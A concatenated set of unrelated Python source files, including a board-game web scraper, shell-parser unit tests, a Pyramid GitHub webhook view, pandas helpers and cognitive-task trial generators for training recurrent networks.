callback=self.parse_boardgame,
endpoint='render.html',
meta={'bg': bg, 'bg_link': bg_link},
args={'wait': 4}
)
next_page = response.xpath(selector_paths.SEL_NEXT_PG).extract_first()
next_page_url = response.urljoin(next_page)
yield SplashRequest(
url=next_page_url,
callback=self.parse
)
def parse_boardgame(self, response):
bg = response.meta['bg']
# bg_link = response.meta['bg_link']
# get min/max players
bg['min_players'] = response.xpath(
selector_paths.SEL_MIN_PLAYERS).extract_first()
bg['max_players'] = response.xpath(
selector_paths.SEL_MAX_PLAYERS).extract_first()
# check for min/max time
bg['time'] = response.xpath(
selector_paths.SEL_MAX_TIME).extract_first()
if bg['time'] is None: # no max time, get min.
bg['time'] = response.xpath(selector_paths.SEL_MIN_TIME).extract_first()
bg['weight'] = response.xpath(
selector_paths.SEL_WEIGHT).extract_first()
bg['min_age'] = response.xpath(
selector_paths.SEL_MIN_AGE).extract_first()
# some pages do not contain reviews, do some exception work.
bg['txt_cnt'] = response.xpath(
selector_paths.SEL_TXT_REVIEWS).extract_first()
bg['vid_cnt'] = response.xpath(
selector_paths.SEL_VID_REVIEWS).extract_first()
# credits_link = bg_link + CREDITS_URI
bg['mechanisms'] = {
k
for
k in response.xpath(
selector_paths.SEL_MECHANISMS_ALT).extract()
}
# yield SplashRequest(
# credits_link,
# callback=self.parse_credits,
# meta={'bg': bg}
# )
yield bg
def parse_credits(self, response):
bg = response.meta['bg']
bg['mechanisms'] = {
k
for
k in response.xpath(
selector_paths.SEL_MECHANISMS).extract()
}
if 'mechanisms' not in bg:
# try the old markup method
bg['mechanisms'] = {
k
for
k in response.xpath(
selector_paths.SEL_MECHANISIMS_ALT).extract()
}
yield bg
|
19,225 | 5f40161c258f1be733caf7b48cb37b1a49925573 | # -*- coding: utf-8 -*-
from django.http import JsonResponse
def result(object):
data = {}
data['result'] = True
data['message'] = 'success'
data['data'] = object
return JsonResponse(data)
|
19,226 | b2aed62abe0830c77bdeb16eaa2b9b040b69607f |
cake = [[1, 1, 1, 1],[1, 1, 1, 1],[1, 1, 1, 1],[1, 1, 1, 1]]
[print(cake[i]) for i in range(4)]
N = 4
result = 2
for y in range(1,N):
for x in range(1, N):
# 1면
a = 0
for yy in range(y):
for xx in range(x):
a += cake[yy][xx]
# 2면
b = 0
for yy in range(y, N):
for xx in range(x):
b += cake[yy][xx]
# 3면
c = 0
for yy in range(y):
for xx in range(x, N):
c += cake[yy][xx]
d = 0
# 4면
for yy in range(y, N):
for xx in range(x, N):
d += cake[yy][xx]
if a == b == c == d:
result =1
print(a, b, c, d)
print(result) |
19,227 | 4a2b7ece75471ec1d6bfecf148ea826ce3781f45 | # Class to represent an argument on the command line
# Can be user for both required arguments as well as values for optional arguments
class Argument(object):
def __init__(self, name=None):
self.name = name
@classmethod
def build(cls, argument_dict):
return Argument(name=argument_dict.get('name', None))
|
19,228 | b0228dd7e8285ba8a67e426343044ddce16f67a0 | import unittest
from cffi import FFI
from test_functions import *
class TestCompoundList(unittest.TestCase):
def __init__(self, arg):
unittest.TestCase.__init__(self, arg)
self.ffi = FFI()
self.lib = self.ffi.dlopen("../build/libmy42sh.so")
source = get_source_all_files("../src/includes")
self.ffi.cdef(source)
def init_and_process_lexer(self, command):
clexer = self.lib.lexer_init(command)
self.lib.lexer_process(clexer)
return clexer
def test_01_simple_or(self):
node = self.lib.init_ast_node()
self.assertTrue(
self.lib.read_compound_list(
node,
self.init_and_process_lexer(b'myword || myword')))
def test_02_ending_semi(self):
node = self.lib.init_ast_node()
self.assertTrue(
self.lib.read_compound_list(
node,
self.init_and_process_lexer(b'myword || myword;')))
def test_03_and_plus_or(self):
node = self.lib.init_ast_node()
self.assertTrue(
self.lib.read_compound_list(
node,
self.init_and_process_lexer(b'myword || myword & myword')))
def test_04_with_newlines(self):
node = self.lib.init_ast_node()
self.assertTrue(
self.lib.read_compound_list(
node,
self.init_and_process_lexer(b'myword || myword \n myword')))
def test_05_simple_word(self):
node = self.lib.init_ast_node()
self.assertTrue(
self.lib.read_compound_list(
node,
self.init_and_process_lexer(b'myword')))
def test_06_or_node_attributes(self):
node = self.lib.init_ast_node()
self.lib.read_compound_list(node, self.init_and_process_lexer(b'word1; word2'))
list_node_1 = node.data.s_list_node
and_or_1 = list_node_1.left.data.s_and_or_node
command_1 = and_or_1.left.data.s_pipeline_node.commands[0].data \
.s_command_node.content.data.s_simple_command_node
self.assertEqual(list_node_1.type, self.lib.LIST_SEMI)
self.assertEqual(self.ffi.string(command_1.elements[0].data.s_word.value), b'word1')
list_node_2 = list_node_1.right.data.s_list_node
and_or_2 = list_node_2.left.data.s_and_or_node
command_2 = and_or_2.left.data.s_pipeline_node.commands[0].data \
.s_command_node.content.data.s_simple_command_node
self.assertEqual(list_node_2.type, self.lib.LIST_NONE)
self.assertEqual(self.ffi.string(command_2.elements[0].data.s_word.value), b'word2')
def test_07_and_node_attributes(self):
node = self.lib.init_ast_node()
self.lib.read_compound_list(node, self.init_and_process_lexer(b'word1 & word2'))
list_node_1 = node.data.s_list_node
and_or_1 = list_node_1.left.data.s_and_or_node
command_1 = and_or_1.left.data.s_pipeline_node.commands[0].data \
.s_command_node.content.data.s_simple_command_node
self.assertEqual(list_node_1.type, self.lib.LIST_AND)
self.assertEqual(self.ffi.string(command_1.elements[0].data.s_word.value), b'word1')
list_node_2 = list_node_1.right.data.s_list_node
and_or_2 = list_node_2.left.data.s_and_or_node
command_2 = and_or_2.left.data.s_pipeline_node.commands[0].data \
.s_command_node.content.data.s_simple_command_node
self.assertEqual(list_node_2.type, self.lib.LIST_NONE)
self.assertEqual(self.ffi.string(command_2.elements[0].data.s_word.value), b'word2')
|
19,229 | ed8ddce220d628c4b5a259b937b3d6881f67f108 | from pyramid.view import view_config
from pyramid.security import authenticated_userid
from pyramid.httpexceptions import HTTPFound
import statatat.models as m
from statatat.widgets.graph import make_chart
import requests
# http://developer.github.com/v3/repos/hooks/
github_api_url = "https://api.github.com/hub"
github_events = [
"push",
#"issues",
#"issue_comment",
#"pull_request",
#"gollum",
#"watch",
#"download",
#"fork",
#"fork_apply",
#"member",
#"public",
#"status",
]
@view_config(route_name='new_key')
def new_key(request):
username = authenticated_userid(request)
if not username:
# TODO -- raise the right status code
return HTTPFound("/")
user = m.User.query.filter_by(username=username).one()
key = m.SourceKey(notes=request.POST.get('notes'))
m.DBSession.add(key)
user.source_keys.append(key)
return HTTPFound(location="/" + username)
@view_config(route_name='home', renderer='index.mak')
def home(request):
backend_key = "moksha.livesocket.backend"
return {
'chart': make_chart(request.registry.settings[backend_key]),
}
@view_config(name='toggle', context=m.Repo, renderer='json')
def repo_toggle_enabled(request):
repo = request.context
repo.enabled = not repo.enabled
data = {
"access_token": request.session['token'],
"hub.mode": ['unsubscribe', 'subscribe'][repo.enabled],
# TODO -- use our own callback and not requestb.in
# ... think over the best pattern for traversal first.
"hub.callback": "http://statatat.ws/webhooks/github",
}
for event in github_events:
data["hub.topic"] = "https://github.com/%s/%s/events/%s" % (
repo.user.username, repo.name, event)
# Subscribe to events via pubsubhubbub
result = requests.post(github_api_url, data=data)
# TODO -- handle errors more gracefully.
assert(result.status_code == 204)
return {
'status': 'ok',
'enabled': request.context.enabled,
'repo': request.context.__json__(),
}
@view_config(name='revoke', context=m.SourceKey, renderer='json')
def source_key_revoke(request):
key = request.context
key.revoked = True
return key.__json__()
@view_config(route_name='docs', renderer='docs.mak')
def docs(request):
return {}
|
19,230 | 1fe1dec96ca1567ecf314a080b2b20f27a15aad3 | # -*- coding: utf-8 -*-
from hagworm.extend.struct import Configure
class _Static(Configure):
def _init_options(self):
##################################################
# MySql数据库
self.MySqlMasterServer = self._parser.get_split_host(r'MySql', r'MySqlMasterServer')
self.MySqlSlaveServer = self._parser.get_split_host(r'MySql', r'MySqlSlaveServer')
self.MySqlName = self._parser.get(r'MySql', r'MySqlName')
self.MySqlUser = self._parser.get(r'MySql', r'MySqlUser')
self.MySqlPasswd = self._parser.get(r'MySql', r'MySqlPasswd')
self.MySqlMasterMinConn = self._parser.getint(r'MySql', r'MySqlMasterMinConn')
self.MySqlMasterMaxConn = self._parser.getint(r'MySql', r'MySqlMasterMaxConn')
self.MySqlSlaveMinConn = self._parser.getint(r'MySql', r'MySqlSlaveMinConn')
self.MySqlSlaveMaxConn = self._parser.getint(r'MySql', r'MySqlSlaveMaxConn')
##################################################
# Mongo数据库
self.MongoHost = self._parser.get_split_str(r'Mongo', r'MongoHost')
self.MongoName = self._parser.get(r'Mongo', r'MongoName')
self.MongoUser = self._parser.get(r'Mongo', r'MongoUser')
self.MongoPasswd = self._parser.get(r'Mongo', r'MongoPasswd')
self.MongoMinConn = self._parser.getint(r'Mongo', r'MongoMinConn')
self.MongoMaxConn = self._parser.getint(r'Mongo', r'MongoMaxConn')
##################################################
# 缓存
self.RedisHost = self._parser.get_split_host(r'Redis', r'RedisHost')
self.RedisBase = self._parser.getint(r'Redis', r'RedisBase')
self.RedisPasswd = self._parser.getstr(r'Redis', r'RedisPasswd')
self.RedisMinConn = self._parser.getint(r'Redis', r'RedisMinConn')
self.RedisMaxConn = self._parser.getint(r'Redis', r'RedisMaxConn')
self.RedisExpire = self._parser.getint(r'Redis', r'RedisExpire')
self.RedisKeyPrefix = self._parser.get(r'Redis', r'RedisKeyPrefix')
##################################################
class _Dynamic(Configure):
def _init_options(self):
##################################################
# 基本
self.Port = self._parser.getint(r'Base', r'Port')
self.Debug = self._parser.getboolean(r'Base', r'Debug')
self.GZip = self._parser.getboolean(r'Base', r'GZip')
self.Secret = self._parser.get(r'Base', r'Secret')
self.ProcessNum = self._parser.getint(r'Base', r'ProcessNum')
##################################################
# 日志
self.LogLevel = self._parser.get(r'Log', r'LogLevel')
self.LogFilePath = self._parser.get(r'Log', r'LogFilePath')
self.LogFileSplitSize = self._parser.getint(r'Log', r'LogFileSplitSize')
self.LogFileSplitTime = self._parser.get(r'Log', r'LogFileSplitTime')
self.LogFileBackups = self._parser.getint(r'Log', r'LogFileBackups')
##################################################
# 线程/进程
self.ThreadPoolMaxWorkers = self._parser.getint(r'Pool', r'ThreadPoolMaxWorkers')
self.ProcessPoolMaxWorkers = self._parser.getint(r'Pool', r'ProcessPoolMaxWorkers')
##################################################
ConfigStatic = _Static()
ConfigDynamic = _Dynamic()
|
19,231 | 27c3871b192c088d6c2a2bcf1af6471a05f9ed78 | """Utilities for DataFrames"""
import pandas as pd
import numpy as np
def isLessEqual(df1, df2):
"""
Tests if each value in df1 is less than or equal the
corresponding value in df2.
"""
indices = list(set(df1.index).intersection(df2.index))
dff1 = df1.loc[indices, :]
dff2 = df2.loc[indices, :]
df = dff1 - dff2
df_tot = df.applymap(lambda v: v <= 0)
result = df_tot.sum().sum() == df.size
return result
def mean(dfs):
"""
Calculates the mean of values in a list of dataframes
for the same index, column.
:param list-pd.DataFrame dfs:
:return pd.DataFrame:
"""
df_mean = sum(dfs)
return df_mean/len(dfs)
def std(dfs):
"""
Calculates the standard deviation of values in a
list of dataframes for the same index, column.
:param list-pd.DataFrame dfs:
:return pd.DataFrame:
"""
df_mean = mean(dfs)
df_sq = sum([(df - df_mean)*(df - df_mean) for df in dfs])
return df_sq / len(dfs)
def subset(df, items, axis=1):
"""
Constructs a dataframe is a subset to the items, by row or column.
Parameters
----------
df: pd.DataFrame
items: list
columns if axis = 1
indices if axis = 0
axis: int
0 - rows
1 - columns
Returns
-------
pd.DataFrame
"""
if axis == 1:
columns = list(set(items).intersection(df.columns))
return df[columns]
elif axis == 0:
indices = list(set(items).intersection(df.index))
return df.loc[indices, :]
else:
raise ValueError("Invalid axis: %d" % axis)
|
19,232 | 043d0e823edc1e819d38504ca39d3a5c508ddbad | import couchdb
couch = couchdb.Server()
#x = raw_input('enter the url\n')
#print x
#del couch[x]
#db = couch.create(x) # newly created
#db = couch['test1'] # existing
visited = raw_input('enter url')
data = raw_input('enter the data')
#try:
db = couch.create('issc')
doc_id1, doc_rev1 = db.save({'_id':visited,'link':data})
# doc_id2, doc_rev2 = db.save({'_id':'unvisited','link':[]})
#except Exception:
# db = server['test']
#doc1 = {"text": "Sandeep","rating": 113} #To insert new record
#db.save(doc1) #To save document
#for id in db:
# print id
#s=db.get('text')
#print s
|
19,233 | bee7b44df6a829106a54e47379601768ae930121 | """Collections of tasks.
Copied from https://github.com/gyyang/multitask."""
from __future__ import division
import six
import numpy as np
# all rules
rules_dict = \
{'all' : ['fdgo', 'reactgo', 'delaygo', 'fdanti', 'reactanti', 'delayanti',
'dm1', 'dm2', 'contextdm1', 'contextdm2', 'multidm',
'delaydm1', 'delaydm2', 'contextdelaydm1', 'contextdelaydm2', 'multidelaydm',
'dmsgo', 'dmsnogo', 'dmcgo', 'dmcnogo'],
'mante' : ['contextdm1', 'contextdm2'],
'oicdmc' : ['oic', 'dmc']}
# Store indices of rules
rule_index_map = dict()
for ruleset, rules in rules_dict.items():
rule_index_map[ruleset] = dict()
for ind, rule in enumerate(rules):
rule_index_map[ruleset][rule] = ind
def get_num_ring(ruleset):
'''get number of stimulus rings'''
return 3 if ruleset=='oicdmc' else 2
def get_num_rule(ruleset):
'''get number of rules'''
return len(rules_dict[ruleset])
def get_rule_index(rule, config):
'''get the input index for the given rule'''
return rule_index_map[config['ruleset']][rule]+config['rule_start']
def get_dist(original_dist):
'''Get the distance in periodic boundary conditions'''
return np.minimum(abs(original_dist),2*np.pi-abs(original_dist))
class Trial(object):
"""Class representing a batch of trials."""
def __init__(self, config, tdim, batch_size):
"""A batch of trials.
Args:
config: dictionary of configurations
tdim: int, number of time steps
batch_size: int, batch size
"""
self.float_type = 'float32' # This should be the default
self.config = config
self.dt = self.config['dt']
self.n_eachring = self.config['n_eachring']
self.n_input = self.config['n_input']
self.n_output = self.config['n_output']
self.pref = np.arange(0,2*np.pi,2*np.pi/self.n_eachring) # preferences
self.batch_size = batch_size
self.tdim = tdim
self.x = np.zeros((tdim, batch_size, self.n_input), dtype=self.float_type)
self.y = np.zeros((tdim, batch_size, self.n_output), dtype=self.float_type)
if self.config['loss_type'] == 'lsq':
self.y[:,:,:] = 0.05
# y_loc is the stimulus location of the output, -1 for fixation, (0,2 pi) for response
self.y_loc = -np.ones((tdim, batch_size) , dtype=self.float_type)
self._sigma_x = config['sigma_x']*np.sqrt(2/config['alpha'])
def expand(self, var):
"""Expand an int/float to list."""
if not hasattr(var, '__iter__'):
var = [var] * self.batch_size
return var
def add(self, loc_type, locs=None, ons=None, offs=None, strengths=1, mods=None):
"""Add an input or stimulus output.
Args:
loc_type: str (fix_in, stim, fix_out, out), type of information to be added
locs: array of list of float (batch_size,), locations to be added, only for loc_type=stim or out
ons: int or list, index of onset time
offs: int or list, index of offset time
strengths: float or list, strength of input or target output
mods: int or list, modalities of input or target output
"""
ons = self.expand(ons)
offs = self.expand(offs)
strengths = self.expand(strengths)
mods = self.expand(mods)
for i in range(self.batch_size):
if loc_type == 'fix_in':
self.x[ons[i]: offs[i], i, 0] = 1
elif loc_type == 'stim':
# Assuming that mods[i] starts from 1
self.x[ons[i]: offs[i], i, 1+(mods[i]-1)*self.n_eachring:1+mods[i]*self.n_eachring] \
+= self.add_x_loc(locs[i])*strengths[i]
elif loc_type == 'fix_out':
# Notice this shouldn't be set at 1, because the output is logistic and saturates at 1
if self.config['loss_type'] == 'lsq':
self.y[ons[i]: offs[i], i, 0] = 0.8
else:
self.y[ons[i]: offs[i], i, 0] = 1.0
elif loc_type == 'out':
if self.config['loss_type'] == 'lsq':
self.y[ons[i]: offs[i], i, 1:] += self.add_y_loc(locs[i])*strengths[i]
else:
y_tmp = self.add_y_loc(locs[i])
y_tmp /= np.sum(y_tmp)
self.y[ons[i]: offs[i], i, 1:] += y_tmp
self.y_loc[ons[i]: offs[i], i] = locs[i]
else:
raise ValueError('Unknown loc_type')
def add_x_noise(self):
"""Add input noise."""
self.x += self.config['rng'].randn(*self.x.shape)*self._sigma_x
def add_c_mask(self, pre_offs, post_ons):
"""Add a cost mask.
Usually there are two periods, pre and post response
Scale the mask weight for the post period so in total it's as important
as the pre period
"""
pre_on = int(100/self.dt) # never check the first 100ms
pre_offs = self.expand(pre_offs)
post_ons = self.expand(post_ons)
if self.config['loss_type'] == 'lsq':
c_mask = np.zeros((self.tdim, self.batch_size, self.n_output), dtype=self.float_type)
for i in range(self.batch_size):
# Post response periods usually have the same length across tasks
c_mask[post_ons[i]:, i, :] = 5.
# Pre-response periods usually have different lengths across tasks
# To keep cost comparable across tasks
# Scale the cost mask of the pre-response period by a factor
c_mask[pre_on:pre_offs[i], i, :] = 1.
# self.c_mask[:, :, 0] *= self.n_eachring # Fixation is important
c_mask[:, :, 0] *= 2. # Fixation is important
self.c_mask = c_mask.reshape((self.tdim*self.batch_size, self.n_output))
else:
c_mask = np.zeros((self.tdim, self.batch_size), dtype=self.float_type)
for i in range(self.batch_size):
# Post response periods usually have the same length across tasks
# Having it larger than 1 encourages the network to achieve higher performance
c_mask[post_ons[i]:, i] = 5.
# Pre-response periods usually have different lengths across tasks
# To keep cost comparable across tasks
# Scale the cost mask of the pre-response period by a factor
c_mask[pre_on:pre_offs[i], i] = 1.
self.c_mask = c_mask.reshape((self.tdim*self.batch_size,))
self.c_mask /= self.c_mask.mean()
def add_rule(self, rule, on=None, off=None, strength=1.):
"""Add rule input."""
if isinstance(rule, int):
self.x[on:off, :, self.config['rule_start']+rule] = strength
else:
ind_rule = get_rule_index(rule, self.config)
self.x[on:off, :, ind_rule] = strength
def add_x_loc(self, x_loc):
"""Input activity given location."""
dist = get_dist(x_loc-self.pref) # periodic boundary
dist /= np.pi/8
return 0.8*np.exp(-dist**2/2)
def add_y_loc(self, y_loc):
"""Target response given location."""
dist = get_dist(y_loc-self.pref) # periodic boundary
if self.config['loss_type'] == 'lsq':
dist /= np.pi/8
y = 0.8*np.exp(-dist**2/2)
else:
# One-hot output
y = np.zeros_like(dist)
ind = np.argmin(dist)
y[ind] = 1.
return y
def test_init(config, mode, **kwargs):
'''
Test initialization of model. mode is not actually used
Fixation is on then off.
'''
dt = config['dt']
tdim = int(10000/dt)
fix_offs = [int(800/dt)]
batch_size = 1
trial = Trial(config, tdim, batch_size)
trial.add('fix_in', offs=fix_offs)
return trial
def delaygo_(config, mode, anti_response, **kwargs):
'''
Fixate whenever fixation point is shown,
saccade to the location of the previously shown stimulus
whenever the fixation point is off
Generate one batch of trials
The fixation is shown between (0, fix_off)
The stimulus is shown between (stim_on, stim_off)
The output should be fixation location for (0, fix_off)
and the stimulus location for (fix_off, T)
:param mode: the mode of generating. Options: 'random', 'explicit'...
Optional parameters:
:param batch_size: Batch size (required for mode=='random')
:param tdim: dimension of time (required for mode=='sample')
:param param: a dictionary of parameters (required for mode=='explicit')
:return: 2 Tensor3 data array (Time, Batchsize, Units)
'''
dt = config['dt']
rng = config['rng']
if mode == 'random': # Randomly generate parameters
batch_size = kwargs['batch_size']
# A list of locations of stimuluss and on/off time
stim_locs = rng.rand(batch_size)*2*np.pi
# stim_ons = int(500/dt)
stim_ons = int(rng.choice([300, 500, 700])/dt)
# stim_offs = stim_ons + int(200/dt)
stim_offs = stim_ons + int(rng.choice([200, 400, 600])/dt)
fix_offs = stim_offs + int(rng.choice([200, 400, 800, 1600])/dt)
# fix_offs = stim_offs + int(rng.choice([1600])/dt)
tdim = fix_offs + int(500/dt)
stim_mod = rng.choice([1,2])
elif mode == 'test':
tdim = int(2500/dt)
n_stim_loc, n_stim_mod = batch_shape = 20, 2
batch_size = np.prod(batch_shape)
ind_stim_loc, ind_stim_mod = np.unravel_index(range(batch_size),batch_shape)
fix_offs = int(2000/dt)
stim_locs = 2*np.pi*ind_stim_loc/n_stim_loc
stim_ons = int(500/dt)
stim_mod = ind_stim_mod + 1
stim_offs = int(1000/dt)
elif mode == 'psychometric':
p = kwargs['params']
stim_locs = p['stim_locs']
# Time of stimuluss on/off
stim_ons = int(p['stim_ons']/dt)
stim_offs = int(p['stim_offs']/dt)
delay_time = int(p['delay_time']/dt)
fix_offs = stim_offs + delay_time
tdim = int(400/dt) + fix_offs
stim_mod = 1
batch_size = len(stim_locs)
else:
raise ValueError('Unknown mode: ' + str(mode))
check_ons= fix_offs + int(100/dt)
# Response locations
stim_locs = np.array(stim_locs)
if not anti_response:
response_locs = stim_locs
else:
response_locs = (stim_locs+np.pi)%(2*np.pi)
trial = Trial(config, tdim, batch_size)
trial.add('fix_in', offs=fix_offs)
trial.add('stim', stim_locs, ons=stim_ons, offs=stim_offs, mods=stim_mod)
trial.add('fix_out', offs=fix_offs)
trial.add('out', response_locs, ons=fix_offs)
trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)
trial.epochs = {'fix1' : (None, stim_ons),
'stim1' : (stim_ons, stim_offs),
'delay1' : (stim_offs, fix_offs),
'go1' : (fix_offs, None)}
return trial
def delaygo(config, mode, **kwargs):
return delaygo_(config, mode, False, **kwargs)
def contextdm_genstim(batch_size, rng, stim_coh_range=None):
stim_mean = rng.uniform(0.8, 1.2, (batch_size,))
if stim_coh_range is None:
stim_coh_range = np.array([0.16, 0.32, 0.64])*1.0
stim_coh = rng.choice(stim_coh_range, (batch_size,))
stim_sign = rng.choice([+1, -1], (batch_size,))
stim1_strengths = stim_mean + stim_coh*stim_sign
stim2_strengths = stim_mean - stim_coh*stim_sign
return stim1_strengths, stim2_strengths
def _contextdm(config, mode, attend_mod, **kwargs):
'''
Fixate whenever fixation point is shown.
Two stimuluss are shown in each ring,
Saccade to the one with higher intensity for the attended ring
Generate one batch of trials
The fixation is shown between (0, fix_off)
The two stimuluss is shown between (0,T)
The output should be fixation location for (0, fix_off)
Otherwise the location of the stronger stimulus
In this task, if the model's strategy is to ignore context, and integrate both,
then the maximum performance is 75%. So we need to make the highest correct performance
much higher than that.
:param mode: the mode of generating. Options: 'random', 'explicit'...
Optional parameters:
:param batch_size: Batch size (required for mode=='random')
:param tdim: dimension of time (required for mode=='sample')
:param param: a dictionary of parameters (required for mode=='explicit')
:return: 2 Tensor3 data array (Time, Batchsize, Units)
'''
dt = config['dt']
rng = config['rng']
if mode == 'random': # Randomly generate parameters
batch_size = kwargs['batch_size']
# A list of locations of stimuluss, same locations for both modalities
stim_dist = rng.uniform(0.5*np.pi, 1.5*np.pi,(batch_size,))*rng.choice([-1,1],(batch_size,))
stim1_locs = rng.uniform(0, 2*np.pi, (batch_size,))
stim2_locs = (stim1_locs+stim_dist)%(2*np.pi)
stim_coh_range = np.array([0.01, 0.02, 0.04, 0.08])
if ('easy_task' in config) and config['easy_task']:
# stim_coh_range = np.array([0.1, 0.2, 0.4, 0.8])
stim_coh_range *= 10
if (attend_mod == 1) or (attend_mod == 2):
stim1_mod1_strengths, stim2_mod1_strengths = contextdm_genstim(batch_size, rng, stim_coh_range)
stim1_mod2_strengths, stim2_mod2_strengths = contextdm_genstim(batch_size, rng, stim_coh_range)
if attend_mod == 1:
stim1_strengths, stim2_strengths = stim1_mod1_strengths, stim2_mod1_strengths
else:
stim1_strengths, stim2_strengths = stim1_mod2_strengths, stim2_mod2_strengths
else:
stim1_strengths, stim2_strengths = contextdm_genstim(batch_size, rng, stim_coh_range)
stim1_mod12_diff = stim1_strengths * \
np.random.uniform(0.2, 0.8, (batch_size,)) * \
np.random.choice([+1, -1], (batch_size,))
stim1_mod1_strengths = stim1_strengths + stim1_mod12_diff/2
stim1_mod2_strengths = stim1_strengths - stim1_mod12_diff/2
stim2_mod12_diff = stim2_strengths * \
np.random.uniform(0.2, 0.8, (batch_size,)) * \
np.random.choice([+1, -1], (batch_size,))
stim2_mod1_strengths = stim2_strengths + stim2_mod12_diff/2
stim2_mod2_strengths = stim2_strengths - stim2_mod12_diff/2
# Time of stimuluss on/off
stim_on = int(rng.uniform(100,400)/dt)
stim_ons = (np.ones(batch_size)*stim_on).astype(int)
stim_dur = int(rng.choice([400, 800, 1600])/dt)
# stim_dur = rng.choice((np.array([200, 400, 800, 1600])/dt).astype(int)) # Current setting
# stim_dur = int(rng.uniform(500, 1000)/dt) # Current setting
# stim_dur = int(800/dt)
stim_offs = stim_ons+stim_dur
# delay_dur = rng.choice((np.array([200, 400, 800])/dt).astype(int)) # Current setting
delay_dur = 0
fix_offs = stim_offs + delay_dur
# each batch consists of sequences of equal length
tdim = stim_on+stim_dur+delay_dur+int(500/dt)
elif mode == 'test':
tdim = int(2000/dt)
n_stim_loc, n_stim_mod1_strength, n_stim_mod2_strength = batch_shape = 20, 5, 5
batch_size = np.prod(batch_shape)
ind_stim_loc, ind_stim_mod1_strength, ind_stim_mod2_strength = np.unravel_index(range(batch_size),batch_shape)
fix_offs = int(1500/dt)
stim1_locs = 2*np.pi*ind_stim_loc/n_stim_loc
stim2_locs = (stim1_locs+np.pi)%(2*np.pi)
stim1_mod1_strengths = 0.4*ind_stim_mod1_strength/n_stim_mod1_strength+0.8
stim2_mod1_strengths = 2 - stim1_mod1_strengths
stim1_mod2_strengths = 0.4*ind_stim_mod2_strength/n_stim_mod2_strength+0.8
stim2_mod2_strengths = 2 - stim1_mod2_strengths
stim_ons = int(500/dt)
stim_offs = int(1500/dt)
elif mode == 'psychometric':
p = kwargs['params']
stim1_locs = p['stim1_locs']
stim2_locs = p['stim2_locs']
stim1_mod1_strengths = p['stim1_mod1_strengths']
stim2_mod1_strengths = p['stim2_mod1_strengths']
stim1_mod2_strengths = p['stim1_mod2_strengths']
stim2_mod2_strengths = p['stim2_mod2_strengths']
stim_time = int(p['stim_time']/dt)
batch_size = len(stim1_locs)
# Time of stimuluss on/off
stim_ons = int(500/dt)
stim_offs = stim_ons + stim_time
fix_offs = stim_offs
tdim = int(500/dt) + fix_offs
else:
raise ValueError('Unknown mode: ' + str(mode))
# time to check the saccade location
check_ons = fix_offs + int(100/dt)
if attend_mod == 1:
stim1_strengths, stim2_strengths = stim1_mod1_strengths, stim2_mod1_strengths
elif attend_mod == 2:
stim1_strengths, stim2_strengths = stim1_mod2_strengths, stim2_mod2_strengths
elif attend_mod == 'both':
stim1_strengths = stim1_mod1_strengths + stim1_mod2_strengths
stim2_strengths = stim2_mod1_strengths + stim2_mod2_strengths
trial = Trial(config, tdim, batch_size)
trial.add('fix_in', offs=fix_offs)
trial.add('stim', stim1_locs, ons=stim_ons, offs=stim_offs, strengths=stim1_mod1_strengths, mods=1)
trial.add('stim', stim2_locs, ons=stim_ons, offs=stim_offs, strengths=stim2_mod1_strengths, mods=1)
trial.add('stim', stim1_locs, ons=stim_ons, offs=stim_offs, strengths=stim1_mod2_strengths, mods=2)
trial.add('stim', stim2_locs, ons=stim_ons, offs=stim_offs, strengths=stim2_mod2_strengths, mods=2)
trial.add('fix_out', offs=fix_offs)
stim_locs = [stim1_locs[i] if (stim1_strengths[i]>stim2_strengths[i])
else stim2_locs[i] for i in range(batch_size)]
trial.add('out', stim_locs, ons=fix_offs)
trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)
trial.epochs = {'fix1' : (None, stim_ons),
'stim1' : (stim_ons, stim_offs),
# 'delay1' : (stim_offs, fix_offs),
'go1' : (fix_offs, None)}
return trial
def contextdm1(config, mode, **kwargs):
return _contextdm(config, mode, 1, **kwargs)
def contextdm2(config, mode, **kwargs):
return _contextdm(config, mode, 2, **kwargs)
def multidm(config, mode, **kwargs):
return _contextdm(config, mode, 'both', **kwargs)
def reactgo_(config, mode, anti_response, **kwargs):
'''
Fixate when fixation point is shown,
A stimulus will be shown, and the output should saccade to the stimulus location
Generate one batch of trials
The fixation is shown between (0, T)
The stimulus is shown between (fix_off,T)
The output should be fixation location for (0, fix_off)
Otherwise should be the stimulus location
:param mode: the mode of generating. Options: 'random', 'explicit'...
Optional parameters:
:param batch_size: Batch size (required for mode=='random')
:param tdim: dimension of time (required for mode=='sample')
:param param: a dictionary of parameters (required for mode=='explicit')
:return: 2 Tensor3 data array (Time, Batchsize, Units)
'''
dt = config['dt']
rng = config['rng']
if mode == 'random': # Randomly generate parameters
batch_size = kwargs['batch_size']
# each batch consists of sequences of equal length
# A list of locations of fixation points and fixation off time
stim_ons = int(rng.uniform(500,2500)/dt)
tdim = int(500/dt) + stim_ons
# A list of locations of stimuluss (they are always on)
stim_locs = rng.uniform(0, 2*np.pi, (batch_size,))
stim_mod = rng.choice([1,2])
elif mode == 'test':
tdim = int(2500/dt)
n_stim_loc, n_stim_mod = batch_shape = 20, 2
batch_size = np.prod(batch_shape)
ind_stim_loc, ind_stim_mod = np.unravel_index(range(batch_size),batch_shape)
stim_ons = int(2000/dt)
stim_locs = 2*np.pi*ind_stim_loc/n_stim_loc
stim_mod = ind_stim_mod + 1
elif mode == 'psychometric':
p = kwargs['params']
stim_locs = p['stim_locs']
batch_size = len(stim_locs)
# Time of stimuluss on/off
stim_ons = int(1000/dt)
tdim = int(400/dt) + stim_ons
stim_mod = 1
else:
raise ValueError('Unknown mode: ' + str(mode))
# time to check the saccade location
check_ons = stim_ons + int(100/dt)
# Response locations
stim_locs = np.array(stim_locs)
if not anti_response:
response_locs = stim_locs
else:
response_locs = (stim_locs+np.pi)%(2*np.pi)
trial = Trial(config, tdim, batch_size)
trial.add('fix_in')
trial.add('stim', stim_locs, ons=stim_ons, mods=stim_mod)
trial.add('fix_out', offs=stim_ons)
trial.add('out', response_locs, ons=stim_ons)
trial.add_c_mask(pre_offs=stim_ons, post_ons=check_ons)
trial.epochs = {'fix1' : (None, stim_ons),
'go1' : (stim_ons, None)}
return trial
def reactgo(config, mode, **kwargs):
return reactgo_(config, mode, False, **kwargs)
def reactanti(config, mode, **kwargs):
return reactgo_(config, mode, True, **kwargs)
def fdgo_(config, mode, anti_response, **kwargs):
'''
Go with inhibitory control. Important difference with Go task is that
the stimulus is presented from the beginning.
Fixate whenever fixation point is shown,
A stimulus will be shown from the beginning
And output should saccade to the stimulus location
